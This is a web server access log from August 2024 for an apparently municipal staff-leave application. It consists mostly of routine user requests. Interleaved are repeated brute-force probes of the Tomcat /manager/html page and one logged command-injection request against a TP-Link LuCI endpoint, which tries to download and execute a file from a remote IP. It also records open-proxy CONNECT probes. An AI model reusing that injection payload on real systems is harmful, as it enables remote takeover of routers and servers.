190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun/static/calendar-setup.js?85251 HTTP/1.1" 200 2588
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun/static/gxcfg.js?2020121631564 HTTP/1.1" 200 953
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun/static/calendar.js?85251 HTTP/1.1" 200 26246
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun/static/calendar-es.js?85251 HTTP/1.1" 200 1901
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun/static/Resources/PXTools/calendar.png HTTP/1.1" 200 1306
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun/static/gxdec.js?85251 HTTP/1.1" 200 19579
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun/static/Shared/ext/resources/css/ext-all.css?215870 HTTP/1.1" 200 416045
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun/static/trpermisosgoce.js?2020121633681 HTTP/1.1" 200 35904
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun/static/Resources/PXToolsDataSearch.png HTTP/1.1" 200 435
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun/static/Resources/PXToolsGridFirstDisabled.gif HTTP/1.1" 200 100
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun/static/Resources/PXToolsGridNextDisabled.gif HTTP/1.1" 200 90
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun/static/Resources/PXToolsGridPage.gif HTTP/1.1" 200 725
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun/static/Resources/PXToolsActionExcel.png HTTP/1.1" 200 727
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun/static/Resources/PXToolsGridLastDisabled.gif HTTP/1.1" 200 98
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun/static/Resources/PXToolsGridPreviousDisabled.gif HTTP/1.1" 200 90
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun/static/Resources/PXToolsAddAllAction.png HTTP/1.1" 200 495
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun/static/Resources/asc.gif HTTP/1.1" 200 67
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun/static/Resources/desc.gif HTTP/1.1" 200 65
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun//static/Resources/PXToolsGridUpdate.png HTTP/1.1" 200 470
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun//static/Resources/PXToolsGridDisplay.png HTTP/1.1" 200 525
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun//static/Resources/PXToolsActionPrint.png HTTP/1.1" 200 404
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun//static/Resources/PXTools/ActionInsert.png HTTP/1.1" 200 1482
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun//static/Resources/PXToolsActionDisabled.gif HTTP/1.1" 200 53
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun//static/Resources/PXToolsHeaderHelp.png HTTP/1.1" 200 1333
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun//static/Resources/PXToolsGridDelete.png HTTP/1.1" 200 538
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun//static/Resources/PXToolsHeaderFavorites.png HTTP/1.1" 200 1414
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun/static/Shared/ext/resources/themes/images/default/panel/bg-headersPanel.png HTTP/1.1" 200 255
190.171.141.122 - - [12/Aug/2024:14:05:24 -0300] "GET /cormun/static/Shared/ext/resources/themes/images/default/tools/tool-sprites.gif HTTP/1.1" 200 5434
190.171.141.122 - - [12/Aug/2024:14:05:43 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
46.105.97.78 - tomcat [12/Aug/2024:14:06:08 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.122 - - [12/Aug/2024:14:06:13 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6768
190.171.141.122 - - [12/Aug/2024:14:06:13 -0300] "GET /cormun/static/gxcfg.js?20201215124560 HTTP/1.1" 200 953
190.171.141.122 - - [12/Aug/2024:14:06:13 -0300] "GET /cormun/static/Resources/prompt.gif HTTP/1.1" 200 902
190.171.141.122 - - [12/Aug/2024:14:06:13 -0300] "GET /cormun/static/permisogoce.js?20201215124939 HTTP/1.1" 200 27790
190.171.141.122 - - [12/Aug/2024:14:06:28 -0300] "GET /cormun/servlet/permisogoce?950495dfb40928c23ffd3669440486d4405e4735bda289f35cfa66430b509d12fec9a34556c90240a94cf136e7b16725f07e4f1990117fee9484802b18674b27,gx-no-cache=1723435447548 HTTP/1.1" 200 226
190.171.141.122 - - [12/Aug/2024:14:06:28 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.141.122 - - [12/Aug/2024:14:06:28 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.141.122 - - [12/Aug/2024:14:06:28 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_994d53_40x100.png HTTP/1.1" 404 1097
190.171.141.122 - - [12/Aug/2024:14:06:28 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_ebccce_256x240.png HTTP/1.1" 404 1089
190.171.141.122 - - [12/Aug/2024:14:06:32 -0300] "GET /cormun/servlet/permisogoce?950495dfb40928c23ffd3669440486d4405e4735bda289f35cfa66430b509d120ab522c7af587dd8db14ccffe9af0b1e0e45c15ec5d626aac05ec55e60e4efeb,gx-no-cache=1723435452282 HTTP/1.1" 200 85
190.171.141.122 - - [12/Aug/2024:14:06:41 -0300] "GET /cormun/servlet/permisogoce?950495dfb40928c23ffd3669440486d4e4286d556540cb71731af0b714bdba394bac5c5b1a6a312c06ec901a3d1be6f094b45aa5622ecbb8ecfc7ee0e8ec2c57,gx-no-cache=1723435461026 HTTP/1.1" 200 48
190.171.141.122 - - [12/Aug/2024:14:06:46 -0300] "POST /cormun/servlet/permisogoce?b285e0f59ce26569308b2af96ff2940c,INS,0,,,,gx-no-cache=1723435464902 HTTP/1.1" 200 93
190.171.141.122 - - [12/Aug/2024:14:06:46 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1005
190.171.141.122 - - [12/Aug/2024:14:06:46 -0300] "GET /cormun/static/gxcfg.js?20221129846035 HTTP/1.1" 200 953
190.171.141.122 - - [12/Aug/2024:14:06:46 -0300] "GET /cormun/static/hpexe_return.js?20221129846037 HTTP/1.1" 200 1633
190.171.141.122 - - [12/Aug/2024:14:06:46 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 10820
190.171.141.122 - - [12/Aug/2024:14:06:49 -0300] "GET /cormun/servlet/apermisogoceprn?20028504,P,20240812130534,PU HTTP/1.1" 200 1667
190.171.141.122 - - [12/Aug/2024:14:07:31 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6768
190.171.141.122 - - [12/Aug/2024:14:07:40 -0300] "GET /cormun/servlet/permisogoce?950495dfb40928c23ffd3669440486d4405e4735bda289f35cfa66430b509d120ab522c7af587dd8db14ccffe9af0b1e0e45c15ec5d626aac05ec55e60e4efeb,gx-no-cache=1723435520163 HTTP/1.1" 200 85
190.171.141.122 - - [12/Aug/2024:14:07:48 -0300] "GET /cormun/servlet/permisogoce?950495dfb40928c23ffd3669440486d4e4286d556540cb71731af0b714bdba392872ee4ac4262a93b4a91bdc0d9743bc94b45aa5622ecbb8ecfc7ee0e8ec2c57,gx-no-cache=1723435528009 HTTP/1.1" 200 48
190.171.141.122 - - [12/Aug/2024:14:07:51 -0300] "POST /cormun/servlet/permisogoce?b285e0f59ce26569308b2af96ff2940c,INS,0,,,,gx-no-cache=1723435530499 HTTP/1.1" 200 93
190.171.141.122 - - [12/Aug/2024:14:07:51 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1005
190.171.141.122 - - [12/Aug/2024:14:07:51 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 11008
190.171.141.122 - - [12/Aug/2024:14:07:56 -0300] "GET /cormun/servlet/apermisogoceprn?20028504,P,20240812130652,PU HTTP/1.1" 200 1667
46.105.97.78 - tomcat [12/Aug/2024:14:08:22 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.122 - - [12/Aug/2024:14:08:51 -0300] "GET /cormun/servlet/permisogoce?UPD,20028504,P,20240812130534, HTTP/1.1" 200 6825
190.171.141.122 - - [12/Aug/2024:14:08:52 -0300] "GET /cormun/servlet/permisogoce?950495dfb40928c23ffd3669440486d4405e4735bda289f35cfa66430b509d12605d48e619354cfb4dc368ca29ac1ec9c80ef15d7e2fe8dc113085d3739e33e9caf93224b0da373e157bd7a538fc7c82,gx-no-cache=1723435592115 HTTP/1.1" 200 86
190.171.141.122 - - [12/Aug/2024:14:09:01 -0300] "GET /cormun/servlet/permisogoce?950495dfb40928c23ffd3669440486d4e4286d556540cb71731af0b714bdba39e0378c4dfbc25f0e6bf0c13ee059cca3f773ba7994ab24911981a04b88e5eaaa,gx-no-cache=1723435600978 HTTP/1.1" 200 48
190.171.141.122 - - [12/Aug/2024:14:09:01 -0300] "POST /cormun/servlet/permisogoce?b285e0f59ce26569308b2af96ff2940c,UPD,20028504,P,20240812130534,,gx-no-cache=1723435600993 HTTP/1.1" 200 93
190.171.141.122 - - [12/Aug/2024:14:09:01 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1023
190.171.141.122 - - [12/Aug/2024:14:09:01 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 11020
190.171.141.122 - - [12/Aug/2024:14:09:06 -0300] "GET /cormun/servlet/apermisogoceprn?20028504,P,20240812130534,PU HTTP/1.1" 200 1659
46.105.97.78 - tomcat [12/Aug/2024:14:10:36 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.138 - - [12/Aug/2024:14:11:58 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1720
190.171.141.138 - - [12/Aug/2024:14:12:00 -0300] "POST /cormun/servlet/hlogin?4532c53529a385dbb8698317866ddc03,gx-no-cache=1723482657699 HTTP/1.1" 200 418
190.171.141.138 - - [12/Aug/2024:14:12:04 -0300] "POST /cormun/servlet/hlogin?4532c53529a385dbb8698317866ddc03,gx-no-cache=1723482660986 HTTP/1.1" 200 90
190.171.141.138 - - [12/Aug/2024:14:12:04 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 949
190.171.141.138 - - [12/Aug/2024:14:12:05 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4476
190.171.141.138 - - [12/Aug/2024:14:12:09 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 15517
46.105.97.78 - tomcat [12/Aug/2024:14:12:49 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [12/Aug/2024:14:15:03 -0300] "GET /manager/html HTTP/1.1" 403 3196
181.212.47.136 - - [12/Aug/2024:14:15:41 -0300] "-" 400 -
181.212.47.136 - - [12/Aug/2024:14:15:41 -0300] "-" 400 -
181.212.47.136 - - [12/Aug/2024:14:15:41 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1718
181.212.47.136 - - [12/Aug/2024:14:15:41 -0300] "GET /cormun/static/gxtimezone.js?85251 HTTP/1.1" 200 5781
181.212.47.136 - - [12/Aug/2024:14:15:41 -0300] "GET /cormun/static/gxcfg.js?2022112219184450 HTTP/1.1" 200 953
181.212.47.136 - - [12/Aug/2024:14:15:41 -0300] "GET /cormun/static/Resources/CormunLogin.png HTTP/1.1" 200 19132
181.212.47.136 - - [12/Aug/2024:14:15:41 -0300] "GET /cormun/static/messages.spa.js?85251 HTTP/1.1" 200 30736
181.212.47.136 - - [12/Aug/2024:14:15:41 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?1759030 HTTP/1.1" 200 100853
181.212.47.136 - - [12/Aug/2024:14:15:41 -0300] "GET /cormun/static/hlogin.js?2022112219184458 HTTP/1.1" 200 2156
181.212.47.136 - - [12/Aug/2024:14:15:41 -0300] "GET /cormun/static/gxgral.js?85251 HTTP/1.1" 200 384558
181.212.47.136 - - [12/Aug/2024:14:15:41 -0300] "GET /cormun/static/Resources/PXToolsLoginTop.png HTTP/1.1" 200 1337
181.212.47.136 - - [12/Aug/2024:14:15:41 -0300] "GET /cormun/static/Resources/PXToolsLoginBackground.png HTTP/1.1" 200 1164
181.212.47.136 - - [12/Aug/2024:14:15:41 -0300] "GET /cormun/static/Resources/PXToolsButtonLeft.png HTTP/1.1" 200 1310
181.212.47.136 - - [12/Aug/2024:14:15:41 -0300] "GET /cormun/static/Resources/PXToolsButtonBackground.png HTTP/1.1" 200 1176
181.212.47.136 - - [12/Aug/2024:14:15:41 -0300] "GET /cormun/static/Resources/PXToolsButtonRight.png HTTP/1.1" 200 1294
181.212.47.136 - - [12/Aug/2024:14:15:41 -0300] "GET /cormun/static/Resources/PXToolsLoginBottom.png HTTP/1.1" 200 1389
181.212.47.136 - - [12/Aug/2024:14:15:41 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1728
181.212.47.136 - - [12/Aug/2024:14:15:41 -0300] "GET /cormun/static/Resources/indicator.gif HTTP/1.1" 200 1553
181.212.47.136 - - [12/Aug/2024:14:15:41 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
46.105.97.78 - tomcat [12/Aug/2024:14:17:16 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [12/Aug/2024:14:19:29 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [12/Aug/2024:14:21:44 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [12/Aug/2024:14:23:59 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.122 - - [12/Aug/2024:14:24:23 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 11067
190.171.141.122 - - [12/Aug/2024:14:24:23 -0300] "GET /cormun/static/gxcfg.js?202211298463625 HTTP/1.1" 200 953
190.171.141.122 - - [12/Aug/2024:14:24:23 -0300] "GET /cormun/static/trlicencias.js?202211298463889 HTTP/1.1" 200 41883
46.105.97.78 - tomcat [12/Aug/2024:14:26:14 -0300] "GET /manager/html HTTP/1.1" 403 3196
154.213.187.96 - - [12/Aug/2024:14:27:26 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>+cd+%2Ftmp+wget+http%3A%2F%2F45.66.231.213%2Fr%3B+curl+-O+http%3A%2F%2F45.66.231.213%2Fr%3B+chmod+%2Bx+r%3B+.%2Fr%20tplink) HTTP/1.1" 400 -
190.171.152.114 - - [12/Aug/2024:14:28:14 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 6049
190.171.152.114 - - [12/Aug/2024:14:28:14 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1740
46.105.97.78 - tomcat [12/Aug/2024:14:28:28 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.152.114 - - [12/Aug/2024:14:28:30 -0300] "POST /cormun/servlet/hlogin?4f44a180b5c637f92e7ab29a98ad6b4d,gx-no-cache=1723483646679 HTTP/1.1" 200 90
190.171.152.114 - - [12/Aug/2024:14:28:30 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 958
190.171.152.114 - - [12/Aug/2024:14:28:30 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 16176
190.171.152.114 - - [12/Aug/2024:14:28:36 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 16199
181.212.40.185 - - [12/Aug/2024:14:30:03 -0300] "POST /cormun/servlet/hlogin?58b1d11aab8f01c14d3e111f66a34289,gx-no-cache=1723483740016 HTTP/1.1" 440 972
181.212.40.185 - - [12/Aug/2024:14:30:06 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1730
181.212.40.185 - - [12/Aug/2024:14:30:14 -0300] "POST /cormun/servlet/hlogin?ae5ca7ff12a34520aa5e2c9a10b8ac32,gx-no-cache=1723483751302 HTTP/1.1" 200 90
181.212.40.185 - - [12/Aug/2024:14:30:15 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 952
181.212.40.185 - - [12/Aug/2024:14:30:15 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4214
181.212.40.185 - - [12/Aug/2024:14:30:18 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 18614
46.105.97.78 - tomcat [12/Aug/2024:14:30:41 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.152.114 - - [12/Aug/2024:14:32:38 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 16199
46.105.97.78 - tomcat [12/Aug/2024:14:32:54 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [12/Aug/2024:14:35:08 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [12/Aug/2024:14:37:22 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [12/Aug/2024:14:39:35 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [12/Aug/2024:14:41:50 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [12/Aug/2024:14:44:05 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [12/Aug/2024:14:46:19 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [12/Aug/2024:14:48:32 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [12/Aug/2024:14:50:45 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [12/Aug/2024:14:52:58 -0300] "GET /manager/html HTTP/1.1" 403 3196
154.213.184.25 - - [12/Aug/2024:14:53:54 -0300] "CONNECT google.com:443 HTTP/1.1" 400 -
46.105.97.78 - tomcat [12/Aug/2024:14:55:12 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [12/Aug/2024:14:57:25 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [12/Aug/2024:14:59:38 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [12/Aug/2024:15:01:52 -0300] "GET /manager/html HTTP/1.1" 403 3196
207.90.244.3 - - [12/Aug/2024:15:01:54 -0300] "GET / HTTP/1.1" 200 11217
207.90.244.3 - - [12/Aug/2024:15:01:54 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
46.105.97.78 - tomcat [12/Aug/2024:15:04:07 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [12/Aug/2024:15:06:22 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.95.15.15 - - [12/Aug/2024:15:07:00 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 6049
190.95.15.15 - - [12/Aug/2024:15:07:00 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1734
190.95.15.15 - - [12/Aug/2024:15:07:09 -0300] "POST /cormun/servlet/hlogin?e7ba70967fe2430bcc54b60297a1189a,gx-no-cache=1723485965905 HTTP/1.1" 200 90
190.95.15.15 - - [12/Aug/2024:15:07:09 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 954
190.95.15.15 - - [12/Aug/2024:15:07:09 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 11926
46.105.97.78 - tomcat [12/Aug/2024:15:08:36 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [12/Aug/2024:15:10:51 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.149.90 - - [12/Aug/2024:15:12:11 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1724
190.171.149.90 - - [12/Aug/2024:15:12:19 -0300] "POST /cormun/servlet/hlogin?6ba81a44e9f1a72b69d34d781cea0d76,gx-no-cache=1723486164873 HTTP/1.1" 200 426
46.105.97.78 - tomcat [12/Aug/2024:15:13:05 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.149.90 - - [12/Aug/2024:15:14:53 -0300] "POST /cormun/servlet/hlogin?6ba81a44e9f1a72b69d34d781cea0d76,gx-no-cache=1723486318980 HTTP/1.1" 200 90
190.171.149.90 - - [12/Aug/2024:15:14:53 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 952
190.171.149.90 - - [12/Aug/2024:15:14:54 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3848
46.105.97.78 - tomcat [12/Aug/2024:15:15:20 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [12/Aug/2024:15:17:36 -0300] "GET /manager/html HTTP/1.1" 403 3196
154.213.184.25 - - [12/Aug/2024:15:18:54 -0300] "CONNECT google.com:443 HTTP/1.1" 400 -
46.105.97.78 - tomcat [12/Aug/2024:15:19:53 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [12/Aug/2024:15:22:10 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [12/Aug/2024:15:24:26 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [12/Aug/2024:15:26:40 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.149.90 - - [12/Aug/2024:15:27:25 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 13085
190.171.149.90 - - [12/Aug/2024:15:27:28 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6714
190.171.149.90 - - [12/Aug/2024:15:27:28 -0300] "GET /cormun/static/gxcfg.js?20201215124560 HTTP/1.1" 200 953
190.171.149.90 - - [12/Aug/2024:15:27:28 -0300] "GET /cormun/static/Resources/prompt.gif HTTP/1.1" 200 902
190.171.149.90 - - [12/Aug/2024:15:27:28 -0300] "GET /cormun/static/permisogoce.js?20201215124939 HTTP/1.1" 200 27790
46.105.97.78 - tomcat [12/Aug/2024:15:28:55 -0300] "GET /manager/html HTTP/1.1" 403 3196
154.212.141.225 - - [12/Aug/2024:15:30:24 -0300] "GET / HTTP/1.1" 200 11217
46.105.97.78 - tomcat [12/Aug/2024:15:31:09 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.153.26 - - [12/Aug/2024:15:32:01 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1720
190.171.153.26 - - [12/Aug/2024:15:32:01 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1730
190.171.153.26 - - [12/Aug/2024:15:32:01 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
190.171.153.26 - - [12/Aug/2024:15:32:07 -0300] "POST /cormun/servlet/hlogin?247de8c1b844e8f1d918c316122dc3c6,gx-no-cache=1723487462775 HTTP/1.1" 200 90
190.171.153.26 - - [12/Aug/2024:15:32:07 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 950
190.171.153.26 - - [12/Aug/2024:15:32:07 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4293
190.171.153.26 - - [12/Aug/2024:15:32:15 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 10074
190.171.153.26 - - [12/Aug/2024:15:32:15 -0300] "GET /cormun/static/calendar.js?85251 HTTP/1.1" 304 -
190.171.153.26 - - [12/Aug/2024:15:32:15 -0300] "GET /cormun/static/calendar-es.js?85251 HTTP/1.1" 304 -
190.171.153.26 - - [12/Aug/2024:15:32:15 -0300] "GET /cormun/static/calendar-setup.js?85251 HTTP/1.1" 304 -
190.171.153.26 - - [12/Aug/2024:15:32:15 -0300] "GET /cormun/static/gxdec.js?85251 HTTP/1.1" 304 -
181.212.40.185 - - [12/Aug/2024:15:32:17 -0300] "POST /cormun/servlet/trlicencias?ae5ca7ff12a34520aa5e2c9a10b8ac32,,gx-no-cache=1723487473738 HTTP/1.1" 440 972
190.171.153.26 - - [12/Aug/2024:15:32:19 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
181.212.40.185 - - [12/Aug/2024:15:32:19 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 6041
181.212.40.185 - - [12/Aug/2024:15:32:20 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1731
190.171.149.90 - - [12/Aug/2024:15:32:24 -0300] "GET /cormun/servlet/permisogoce?5bdb790119de265d2db23af562fa59a7f2ea13d1aeda99a20e5a7163d1ffe7acdabaa41db0bef1da95cc1641247ddba431c2b9bc1c3b00dd82e0941d28a9610e,gx-no-cache=1723487369807 HTTP/1.1" 200 79
190.171.149.90 - - [12/Aug/2024:15:32:25 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.149.90 - - [12/Aug/2024:15:32:30 -0300] "GET /cormun/servlet/permisogoce?5bdb790119de265d2db23af562fa59a7e9986c0a06190623e8139e83e69a4e76ed342a3ac9da2de8af3c0b6768ef9dbee363edb0c8a3164c7c5420749f0f89e4,gx-no-cache=1723487376058 HTTP/1.1" 200 48
181.212.40.185 - - [12/Aug/2024:15:32:31 -0300] "POST /cormun/servlet/hlogin?737ed6beb33b0329ee84a9279450bcc2,gx-no-cache=1723487487222 HTTP/1.1" 200 90
181.212.40.185 - - [12/Aug/2024:15:32:31 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 951
181.212.40.185 - - [12/Aug/2024:15:32:31 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 18450
190.171.149.90 - - [12/Aug/2024:15:32:34 -0300] "POST /cormun/servlet/permisogoce?6ba81a44e9f1a72b69d34d781cea0d76,INS,0,,,,gx-no-cache=1723487378848 HTTP/1.1" 200 93
190.171.149.90 - - [12/Aug/2024:15:32:34 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1011
190.171.149.90 - - [12/Aug/2024:15:32:34 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 13323
190.171.152.114 - - [12/Aug/2024:15:32:36 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
190.171.152.114 - - [12/Aug/2024:15:32:37 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 6032
190.171.149.90 - - [12/Aug/2024:15:32:37 -0300] "GET /cormun/servlet/apermisogoceprn?13503222,P,20240812142650,PU HTTP/1.1" 200 1662
190.171.152.114 - - [12/Aug/2024:15:32:37 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1739
190.171.153.26 - - [12/Aug/2024:15:32:48 -0300] "POST /cormun/servlet/trlicencias?247de8c1b844e8f1d918c316122dc3c6,,gx-no-cache=1723487503609 HTTP/1.1" 200 13574
190.171.152.114 - - [12/Aug/2024:15:32:53 -0300] "POST /cormun/servlet/hlogin?c0143345a58bbc82195b359fe356b21e,gx-no-cache=1723487509533 HTTP/1.1" 200 90
190.171.152.114 - - [12/Aug/2024:15:32:53 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 956
190.171.152.114 - - [12/Aug/2024:15:32:53 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 12954
190.171.152.114 - - [12/Aug/2024:15:33:02 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7221
46.105.97.78 - tomcat [12/Aug/2024:15:33:24 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.152.114 - - [12/Aug/2024:15:33:33 -0300] "GET /cormun/servlet/permisogoce?3c95c1596a721bef767bbc76f3f8daea89ef2bf439156f4affcd8b5f8b5ab23bb8217fb2088776dd1fcbcfa64bf0a242a31b393fcc1ee8dc929db583908ef1a9,gx-no-cache=1723487549485 HTTP/1.1" 200 77
190.171.152.114 - - [12/Aug/2024:15:33:36 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.152.114 - - [12/Aug/2024:15:33:43 -0300] "GET /cormun/servlet/permisogoce?3c95c1596a721bef767bbc76f3f8daea7a69738dd07f0a9a7de9214fc11c95ab560844b9554c51e34672417cdc12cf4625b69fecc2cae07cb44add3c4bae2faf,gx-no-cache=1723487559606 HTTP/1.1" 200 47
190.171.152.114 - - [12/Aug/2024:15:33:45 -0300] "POST /cormun/servlet/permisogoce?c0143345a58bbc82195b359fe356b21e,INS,0,,,,gx-no-cache=1723487561246 HTTP/1.1" 200 93
190.171.152.114 - - [12/Aug/2024:15:33:45 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1008
190.171.152.114 - - [12/Aug/2024:15:33:45 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 13274
190.171.152.114 - - [12/Aug/2024:15:33:49 -0300] "GET /cormun/servlet/apermisogoceprn?14608244,P,20240812143224,PU HTTP/1.1" 200 1654
190.171.153.26 - - [12/Aug/2024:15:34:37 -0300] "GET /cormun/servlet/trautorizarpermisogoce? HTTP/1.1" 200 8948
190.171.153.26 - - [12/Aug/2024:15:34:37 -0300] "GET /cormun/static/gxcfg.js?2020121645532 HTTP/1.1" 200 953
190.171.153.26 - - [12/Aug/2024:15:34:37 -0300] "GET /cormun/static/trautorizarpermisogoce.js?2020121651492 HTTP/1.1" 200 34948
